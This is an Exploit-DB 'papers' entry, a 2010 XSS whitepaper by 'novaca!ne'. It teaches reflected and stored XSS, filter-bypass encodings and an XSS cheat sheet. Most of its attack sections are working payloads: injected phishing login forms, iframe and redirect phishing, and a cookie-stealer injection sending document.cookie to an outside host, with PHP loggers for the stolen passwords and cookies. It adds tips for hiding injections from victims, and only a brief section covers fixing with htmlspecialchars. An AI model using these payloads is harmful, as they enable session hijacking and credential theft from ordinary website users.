Advanced XSS Knowledge

EDB-ID:

13646

CVE:

N/A


Author:

novaca!ne

Type:

papers


Platform:

Multiple

Date:

2010-03-23


     <|-[___________________________________________________________________________]-|>
       -                                                                             -
       -                          [ Advanced XSS Knowledge ]                         -
       -                             written by novaca!ne                            -
       -                                                                             -
     <|-[___________________________________________________________________________]-|>

# Author: novaca!ne
# Date:   23.03.2010



.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc  °
Website: www.novacaine.biz      .
                                °
Artwork by: Vincenzo            .
                                °
Greetz fly out to:              .
                                °
Vincenzo, J0hn.X3r, fred777,    .
h0yt3r, Easy Laster, td0s,      °
Lorenz, Montaxx, maoshe, Palme  .
and free-hack.com               °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Index:                                °
--(  I  ]> Introduction               .
                                      °
--( II  ]> What exactly is XSS ?      .
                                      °
--( III ]> How to execute XSS commands.
                                      °
--( IV  ]> Bypass techniques          .
                                      °
--(  V  ]> What can we do with XSS ?  .
                                      °
--( VI  ]> How to fix XSS leakages    .
                                      °
--( VII ]> Cheat Sheets               .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°
                           

                            <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                                  |--( I   ]> Introduction
                           <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Dear reader, I wrote this Whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge, knowledge should be free and available 
$ for everyone.
$ You can post and copy this Whitepaper as much as you want, but respect the
$ author's copyrights.

                        <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                              |--( II  ]> What exactly is XSS ?
                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ "XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSS
$ deals with scripting. To be more exact: Javascript. 
$ It's about injecting (almost) every Javascript (and html/css)
$ command/script in a website.
$ XSS flaws comes up every time a website doesn't filter the attackers input.
$ In other words:
$ the attacker can inject his malicious script into a website, and the browser just
$ run's the code or script.

$ There are 3 types of XSS, I'm going to talk about the 2 most used:

$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.

$ Stored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.

$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack. 

                    <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                          |--( III ]> How to execute XSS commands
                   <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Actually, injecting a XSS script is very easy. To check if the target website is
$ vulnerable, just look out for a searchbox or something.
$ Let's say this is how a simple, unsecured search function looks like:

content of index.html 

<html>
 <head>
 <title>Google</title>
 </head>
  <body>
 
   <form method="get" action="search.php">
   Google: 
   <input type="text" name="search" size="20" />
   <input type="submit" class="button" value="Submit" />
   </form>
 
 </body>
</html>

content of google.php

<?php echo $_GET['search']; ?>

# I'm going to use this script as an example for the rest of this paper #

$ Let's say this script is stored on a webspace, when I type in:
$ 123
$ then it leads me to the url:

  http://site.ru/google.php?search=123

$ and shows me

  123

$ But now, let's try to inject a simple javascript alert message :

  <script>alert("turtles");</script>

$ and send it.
$ You can replace "turtles" with any other word you want, and even use ' ' instead
$ of " " for example:

  <script>alert('1234');</script>

$ But I'm keep using "turtles" as example for the rest of this paper.
$ The target website let's us know if it's vulnerable when it prints a popup containing

$ |=========|    |======|
$ | turtles | or | 1234 |
$ |=========|    |======|

$ Instead of the called code, we can even inject every simple html tags e.g.:

  <h1><font color="#00FF00">I like turtles</font></h1>

$ and send it.
$ Also, you can paste the code at the end of the url, and visit the site like:

  www.site.ru/google.php?search=<script>alert('turtles');</script>

$ or

  www.site.ru/google.php?search=<h1><font color="#00FF00">I like turtles</font></h1>

# It's like the attacker is determining the content of the website. #

$ But even if this doesn't work, there's no reason to worry: that means the website
$ uses filter techniques to avoid XSS flaws. But there are also ways to
$ bypass those filters. How this works, you're going to read in the next chapter.

                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                             |--( IV  ]> Bypass techniques
                      <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ There are a lot of ways to bypass XSS filters on websites, I'll number some:

$ 1.) magic_quotes_gpc=ON bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around

$ 1.) magic_quotes_gpc=ON is a php setting (php.ini).
$     It causes that every ' (single-quote), " (double quote) and  \ (backslash)
$     are escaped with a backslash automatically. It's also a well known method
$     to avoid XSS flaws, although it's exploitable.
 
$ How to bypass it when it's ON? - use the javascript function called
$ String.fromCharCode(), just convert your text in decimal characters
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

$ Using "turtles" (without quote sign) will look like this:
 
  String.fromCharCode(116, 117, 114, 116, 108, 101, 115)
 
$ now insert this in your alert script:

  www.site.ru/google.php?search=<script>alert(String.fromCharCode(116, 117, 114, 116, 108, 101, 115));</script>

$  2.) HEX encoding is a useful bypass method, too. Using this step will encode
$      your script, so you can't see clearly on the first look what the code will cause.
$      This is how

  <script>alert(/turtles/);</script>

$ looks like encrypted in HEX:

  www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

$ 3.) Obfuscation - sometimes website administrator simply put words like
$     "script","alert()","''" on the "badwords list", that means, when you
$     search for "script" on the website, it just shows you an error, like
$     "you are not allowed to search for this word" or something.
$     but this is a weak protection, you can bypass it using obfuscation.
$     your javascript code like:

  <sCrIpT>alert('turtles');</ScRiPt>

$     There are like unlimited possibilities, but that leads us to the
$     next chapter...

$ 4.) Trying around: sometimes you just got to try around, because every website
$     is secured/unsecured in a different, unique way. Some doesn't even use
$     cookies for example. Alway's keep a look at the website's source code!
$     Sometimes you need to adjust your XSS script, like:

  "><script>alert(/turtles/);</script>

$ This you need sometimes if you injected your code into a searchbox e.g. and
$ interrupt a html tag, so you first need to close him, then start a new
$ tag (<script>...).

$ Anyway, there are lot's of different methods how to bypass XSS filtration,
$ try around !

                    <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                          |--(  V  ]> What can we do with XSS ?
                   <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Til now I showed you how to spawn a javascript alert message on a website.
$ But now I'll show you how harmful such a XSS flaw can be for your website. Here are
$ some attack techniques you can do with a XSS flaw:

$ 1.) Inject a Phishing script
$ 2.) Iframe Phishing
$ 3.) Redirict Phishing
$ 4.) Cookie stealing

$ 1.) Phishing script inject: Just inject a 'user' and 'password' field in html
$     (With the <html> and <body> tags), that the victim may think he need's
$     to login to the target site.

$ Here an example:

  www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
  <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
  Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> 
  <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
  <br /></form></div></body></html>

content of phishingscript.php

<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

$ 2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
$     iframe where your phishing site is embeeded.
$     Obviously it needs to look just like the target site.

$ Here an example:

  www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>

$ (Note: height="100%" width="100%" means that the whole window is filled with
$ that iframe.)
$ The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
$ difference and log in (If they're are foolish enough).

$ 3.) Rediriction Phishing: Also simple, just inject a javascript rediriction
$     script that leads to your phishingsite, of course it needs to look just
$     like the target site.

$ Here an example:

  www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>

$ or

  www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">

$ 4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
$     attack. In this method you need to do following:

$     Place this cookiestealer.php in your hoster, and then inject a javascript
$     with your cookie stealer script embedded on your target website.
 
content of cookiestealer.php (found it somewhere with google)

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>

$ Save it as cookiestealer.php and create a 'log.txt' and upload both files
$ on your own webspace, in the same directory and set "chmod 777".

$ Inject the following code in your target website:

  http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>

$ Then the victim's cookie (target's website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

$ Obviously you need to replace

  http://www.yourphishingsite.ru

$ With the url of your phishingsite.

# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous.                                               #

                     <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                           |--( VI  ]> How to fix XSS leakages
                   <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ XSS flaws can be very dangerous for your website, even though you can easily
$ secure your own website using the following functions.

##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################

Example usage:

google.php:

<?php echo htmlspecialchars($_GET['search']); ?>

$ OR

##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################

Example usage:

google.php:

<?php echo htmlentities($_GET['search']); ?>

$ What happened? - the function simply replaced every specialchar to a harmless html char.
$ For example when I enter

<script>alert("turtles");</script>

$ it appears

<script>alert("turtles");</script>

$ But without any popup, because the <,>,',"
$ turned into <,>,',"
$ The attackers input has become a harmless, unexecutable html code.

                        <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                              |--( VII ]> Cheat Sheets
                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
$ Enjoy.

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC="jav    ascript:alert('XSS');">

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

#############################################################
#                                                           #
# PROTIP FOR EVERY XSS INJECTION:                           #
# use url shortener services such as tinyurl.com or bit.ly  #
# to 'hide' your injection, so the victim won't know what's #
# behind that url.                                          #
#                                                           #
#############################################################

END OF FILE